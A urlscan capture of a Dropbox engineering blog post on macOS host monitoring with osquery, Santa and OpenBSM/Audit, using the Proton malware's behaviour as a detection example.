dropbox.tech
Open in
urlscan Pro
13.225.78.89
Public Scan
Submitted URL: https://blogs.dropbox.com/tech/2018/04/4696/
Effective URL: https://dropbox.tech/security/macos-monitoring-the-open-source-way
Submission: On November 03 via manual from US — Scanned from DE
Effective URL: https://dropbox.tech/security/macos-monitoring-the-open-source-way
Submission: On November 03 via manual from US — Scanned from DE
Form analysis
2 forms found in the DOMGET https://dropbox.tech/search-results
<form class="dr-header__search-form dr-container__content dr-width-100" method="get" action="https://dropbox.tech/search-results">
<div class="coveo-search-section dr-header__search-input dr-typography-t3 CoveoSearchInterface Coveostate CoveoComponentState CoveoComponentOptions CoveoQueryController CoveoDebug coveo-after-initialization"
data-coveo-api-url="https://search.cloud.coveo.com/rest/search" data-coveo-org-id="dropboxproductionpmlw0l3v" data-coveo-api-key="xx890c8cd9-7704-4dcd-a164-7b515a8f8449" data-searchpage="https://dropbox.tech/search-results.html"
style="display: block;">
<div class="CoveoSearchbox" data-enable-omnibox="true" data-enable-query-suggest-addon="true" data-placeholder="Search" data-number-of-suggestions="5">
<div class="CoveoOmnibox coveo-query-syntax-disabled magic-box" role="search" aria-haspopup="listbox">
<div class="magic-box-input">
<div class="magic-box-underlay"><span class="magic-box-highlight-container"><span data-id="start" data-success="true"><span data-id="Any" data-success="true" data-value=""></span></span></span><span class="magic-box-ghost-text"></span>
</div><input autocomplete="off" type="text" role="combobox" form="coveo-dummy-form" aria-autocomplete="list" title="Insert a query. Press enter to send" aria-expanded="false"
aria-owns="coveo-magicbox-suggestions-b7c0e5c7-481f-ccfd-b694-2dfc7d5c69f1" aria-controls="coveo-magicbox-suggestions-b7c0e5c7-481f-ccfd-b694-2dfc7d5c69f1" aria-label="Search" placeholder="Search">
<div class="magic-box-clear coveo-accessible-button" role="button" aria-label="Clear" tabindex="-1" aria-hidden="true">
<div class="magic-box-icon"><svg focusable="false" enable-background="new 0 0 13 13" viewBox="0 0 13 13" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Clear" class="magic-box-clear-svg">
<title>Clear</title>
<g fill="currentColor">
<path
d="m7.881 6.501 4.834-4.834c.38-.38.38-1.001 0-1.381s-1.001-.38-1.381 0l-4.834 4.834-4.834-4.835c-.38-.38-1.001-.38-1.381 0s-.38 1.001 0 1.381l4.834 4.834-4.834 4.834c-.38.38-.38 1.001 0 1.381s1.001.38 1.381 0l4.834-4.834 4.834 4.834c.38.38 1.001.38 1.381 0s .38-1.001 0-1.381z">
</path>
</g>
</svg></div>
</div>
</div>
<div class="magic-box-suggestions">
<div class="coveo-magicbox-suggestions" id="coveo-magicbox-suggestions-b7c0e5c7-481f-ccfd-b694-2dfc7d5c69f1" role="listbox" aria-label="Search Suggestions">
<div role="option"></div>
</div>
</div>
</div>
<a class="CoveoSearchButton coveo-accessible-button" role="button" aria-label="Search" tabindex="0"><span class="coveo-search-button"><svg focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Search" class="coveo-search-button-svg"><title>Search</title><g fill="currentColor"><path class="coveo-magnifier-circle-svg" d="m8.368 16.736c-4.614 0-8.368-3.754-8.368-8.368s3.754-8.368 8.368-8.368 8.368 3.754 8.368 8.368-3.754 8.368-8.368 8.368m0-14.161c-3.195 0-5.793 2.599-5.793 5.793s2.599 5.793 5.793 5.793 5.793-2.599 5.793-5.793-2.599-5.793-5.793-5.793"></path><path d="m18.713 20c-.329 0-.659-.126-.91-.377l-4.552-4.551c-.503-.503-.503-1.318 0-1.82.503-.503 1.318-.503 1.82 0l4.552 4.551c.503.503.503 1.318 0 1.82-.252.251-.581.377-.91.377"></path></g></svg></span><span class="coveo-search-button-loading"><svg focusable="false" enable-background="new 0 0 18 18" viewBox="0 0 18 18" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Loading" class="coveo-search-button-loading-svg"><title>Loading</title><g fill="currentColor"><path d="m16.76 8.051c-.448 0-.855-.303-.969-.757-.78-3.117-3.573-5.294-6.791-5.294s-6.01 2.177-6.79 5.294c-.134.537-.679.861-1.213.727-.536-.134-.861-.677-.728-1.212 1.004-4.009 4.594-6.809 8.731-6.809 4.138 0 7.728 2.8 8.73 6.809.135.536-.191 1.079-.727 1.213-.081.02-.162.029-.243.029z"></path><path d="m9 18c-4.238 0-7.943-3.007-8.809-7.149-.113-.541.234-1.071.774-1.184.541-.112 1.071.232 1.184.773.674 3.222 3.555 5.56 6.851 5.56s6.178-2.338 6.852-5.56c.113-.539.634-.892 1.184-.773.54.112.887.643.773 1.184-.866 4.142-4.57 7.149-8.809 7.149z"></path></g></svg></span></a>
</div>
<div class="CoveoStyleReplacer"></div>
<div aria-live="polite" class="coveo-visible-to-screen-reader-only"></div>
</div>
<p class="dr-header__search-hint dr-margin-top-30 dr-margin-bottom-0 dr-typography-t5 dr-display-none"> // Press enter to search </p>
</form>
<form role="form" class="dr-typography-t5 dr-newsletter-subscription__form" novalidate="">
<hr class="dr-newsletter-subscription__form-divider">
<div class="dr-margin-top-30 dr-margin-bottom-30 dr-margin-md-top-10 dr-margin-md-bottom-10"> // Subscribe to our monthly email newsletter and get the latest stories in your inbox. </div>
<div class="dr-margin-left-25">
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.application">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.application" name="categories[ ]" type="checkbox" checked="true" value="Application"
data-mid="127814">Application </label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.frontend">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.frontend" name="categories[ ]" type="checkbox" checked="true" value="Front End" data-mid="127842">Front End
</label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.infrastructure">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.infrastructure" name="categories[ ]" type="checkbox" checked="true" value="Infrastructure"
data-mid="127826">Infrastructure </label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.machine-learning">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.machine-learning" name="categories[ ]" type="checkbox" checked="true" value="Machine Learning"
data-mid="127830">Machine Learning </label>
<br class="dr-show-block-from-md">
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.mobile">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.mobile" name="categories[ ]" type="checkbox" checked="true" value="Mobile" data-mid="127834">Mobile </label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.security">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.security" name="categories[ ]" type="checkbox" checked="true" value="Security" data-mid="127838">Security
</label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.culture">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.culture" name="categories[ ]" type="checkbox" checked="true" value="Culture" data-mid="2093614">Culture
</label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.developers">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-input" id="newsletterForm.developers" name="categories[ ]" type="checkbox" checked="true" value="Developers"
data-mid="129642">Developers </label>
<label style="display:none" class="dr-newsletter-subscription__form-label" for="newsletterForm.all">
<input style="opacity:0; position:absolute; left:9999px;" class="dr-newsletter-subscription__form-checkbox dr-newsletter-subscription__form-checkbox--all dr-input" id="newsletterForm.all" checked="true" type="checkbox">All </label>
</div>
<p class="dr-newsletter-subscription__error dr-display-none dr-color-tangerine"> Error occurred! <br>Please try again later </p>
<p class="dr-newsletter-subscription__email-error dr-display-none dr-color-tangerine"> Enter a valid address </p>
<div class="dr-newsletter-subscription__email-container dr-margin-bottom-20 dr-margin-top-40 dr-margin-md-top-0">
<div>// Type your email address here: </div>
<input autocomplete="off" class="dr-newsletter-subscription__form-input dr-flex-1" name="email" type="email">
<div class="dr-newsletter-subscription__actions-container">
<div class="dr-newsletter-subscription__loading dr-display-none"> Submitting... </div>
<button type="submit" class="dr-newsletter-subscription__form-submit dr-button dr-typography-t5"> Subscribe </button>
</div>
</div>
<hr class="dr-newsletter-subscription__form-divider">
</form>
Text Content
Dropbox.Tech Menu * Topics * Application * Front End * Infrastructure * Machine Learning * Mobile * Security * Culture * Developers * Jobs Dark mode Search Clear SearchLoading // Press enter to search MACOS MONITORING THE OPEN SOURCE WAY // By Michael George • Apr 26, 2018 Let’s say a machine in your corporate fleet gets infected with malware. How would you detect it? How could you find out what happened on the machine? What did the malware do? Did it steal your browser’s passwords? What network connections did the malware make? Was it looking for crypto currency? By having good telemetry and a good host monitoring solution for your machines you can collect the context necessary to answer these important questions. Proper host monitoring on macOS can be very difficult for some organizations. It can be hard to find mature tools that proactively detect security incidents. Even when you do find a tool that fits all your needs, you may run into unexpected performance issues that make the machine nearly unusable by your employees. You might also experience issues like having hosts unexpectedly shut down due to a kernel panic. Even if you are able to pinpoint the cause of these issues you may still be unable to configure the tool to prevent the issue from recurring. Due to difficulties like these at Dropbox, we set out to find an alternative solution. One of the first things we did was create a list of requirements and success criteria: * Stability and minimal performance impact * Kernel panics and obvious delays or other lockups are certainly not acceptable * Record interesting activity on the host * Process spawning * Filesystem Modifications * Network activity * Details about configuration settings and installed applications * Record details about these observables which would tell us: * Date and time * How observations are related (parent-child relationships, or shared keys which connect events, like process id) * Additional details to assess the relevance or impact of the event During the investigation we reviewed a number of tools that could solve some of our problems, but none of the tools could solve all of our problems. After careful review we decided that we didn’t want to reinvent the wheel and that having multiple tools that each solved a specific requirement would better serve our needs. We eventually landed on 3 open source tools: osquery, Santa, and the OpenBSM/Audit system; with each tool serving a specific purpose: * osquery provides periodic snapshots describing changes to the state of a machine * Santa provides real-time process launch events containing details about the executing binary * OpenBSM/Audit is real-time system call monitoring module in the macOS kernel that can provide networking, file operations, administrative events, and other system interactions. OSQUERY osquery is an open source operating system instrumentation framework for Windows, macOS, Linux, and FreeBSD by Facebook. This tool allows users to query the state of their system via a SQL interface. Some of the useful features of this service are: * The ability to parse preference and configuration files, list installed applications, current running processes, file path information, and installed browser plugins. * This is useful if we are looking for suspicious applications or if we want to know if a machine has some specific configuration settings. * osquery by default comes with several packs of useful queries and the core application is regularly being updated to include new features. Using osquery we can perform queries to search for IOCs (Indicators of Compromise) on a host such as the recent Proton malware: Example query looking for proton malware (from osquery attack pack) With osquery, we can get a lot of information about the current state and possibly the previous states of the machine. This still leaves us with a gap; what about events that occur between scheduled OSQuery queries? Here comes Santa Claus 🎵! SANTA Santa is an open source tool developed by Google specifically for macOS. It provides information on executed processes and some disk events. For processes, Santa can provide the following info: * sha256 hashes of the executed binary * Quarantine URLs — The full URL for where the binary came from if it was downloaded * PID — process id * PPID — parent process id, which is important for building process trees * The “Common Name” field and sha256 hash of the cert used to sign the binary Another powerful feature that we won’t cover here is Santa’s ability to prevent execution of binaries (binary blacklisting and whitelisting). Using the data we collect from Santa we can investigate most execution actions performed on hosts. Interestingly, this lets us see execution events from the recent Proton malware such as the exfiltration (“exfil”) process: Proton uses a cURL with a File post to exfil data off hosts We can even see what was exfil’d from hosts, such as 1Password vaults, Chrome browser history, etc. Proton used zip to copy 1Password vaults among other sensitive files Using the sha256 hashes provided in the Santa logs we can investigate the reputation of some of the files dropped by Proton. Installing Proton malware Investigating hash in Virustotal OPENBSM/AUDIT With osquery and Santa we have a really good picture of the executions that occur on a host. However, we are still missing some information about what actions are performed by specific applications with respect to network connections and filesystem interactions. osquery can give us some of this information querying the process_open_files table or the process_open_sockets table but there is still a chance we could miss events that happen between query intervals. Therefore, we need a real-time pipeline like the one that Santa gives us. To get this data we leverage the OpenBSM/Audit (or audit) system. This subsystem is built into the macOS kernel and is based on OpenBSM. OpenBSM/Audit provides a real-time stream of information about the host’s activities. During configuration of audit, we will tell audit which audit class of system calls you want it to monitor. For example, if you wanted to monitor network events you would utilize the nt audit class. The nt audit class will create a stream of data in a binary format where you can use another tool provided with audit called auditreduce. This gives the ability to filter out information to specific audit events from the class and convert the binary data to human readable XML-formatted logs. After setting up the appropriate logging services for audit, you can configure audit to produce events for the missing pieces of our puzzle. You can make it monitor for file read, file create, file write, and network events to get a better understanding of system activity that a process is making. Proton malware storing stolen credentials before exfiltration Network call captured by the macOS audit system All of the above interactions could be seen using individual events, which is great. However, what if we combine these events into something more? An example of a process tree for a malicious office document By using timestamps, PID, PPID, Network events, and File events we can create process trees. Each of these process trees can tell a story about what happened when this process was executed. The example above is a common attack technique using office documents with malicious macros to pull malware from the internet and compromise hosts. Once we have a clear picture of what happened via the process trees we can make judgment calls on actions performed by applications. These applications could look legitimate but, in the observed execution context, may be malicious. At Dropbox we are strong proponents for open source software and even stronger proponents for security. Being worthy of trust is our #1 cultural value and is core to our mission as a security team. If you’re interested in working on hard problems, our security team is always hiring talented people. Further Reading: * https://github.com/google/santa * https://osquery.io/ * https://opensource.apple.com/source/OpenBSM/OpenBSM-21/ * https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/05/handbrake-hacked-to-drop-new-variant-of-proton-malware/ * https://www.virustotal.com/ -------------------------------------------------------------------------------- // Tags * Security * Mac * Host Monitoring // Copy link Link copied Copy link * Link copied Copy link * Share on Twitter * Share on Facebook * Share on Linkedin Related posts See more * How we handled a recent phishing incident that targeted Dropbox // Nov 01, 2022 * Defending against SSRF attacks (with help from our bug bounty program) // Sep 20, 2022 * Dropbox bug bounty program has paid out over $1,000,000 // Feb 03, 2020 -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- // Subscribe to our monthly email newsletter and get the latest stories in your inbox. Application Front End Infrastructure Machine Learning Mobile Security Culture Developers All Error occurred! Please try again later Enter a valid address // Type your email address here: Submitting... Subscribe -------------------------------------------------------------------------------- * Jobs * Medium * Privacy * twitter * Terms * Instagram * Work In Progress * RSS feed * Cookies & CCPA preferences * Engineering Career Framework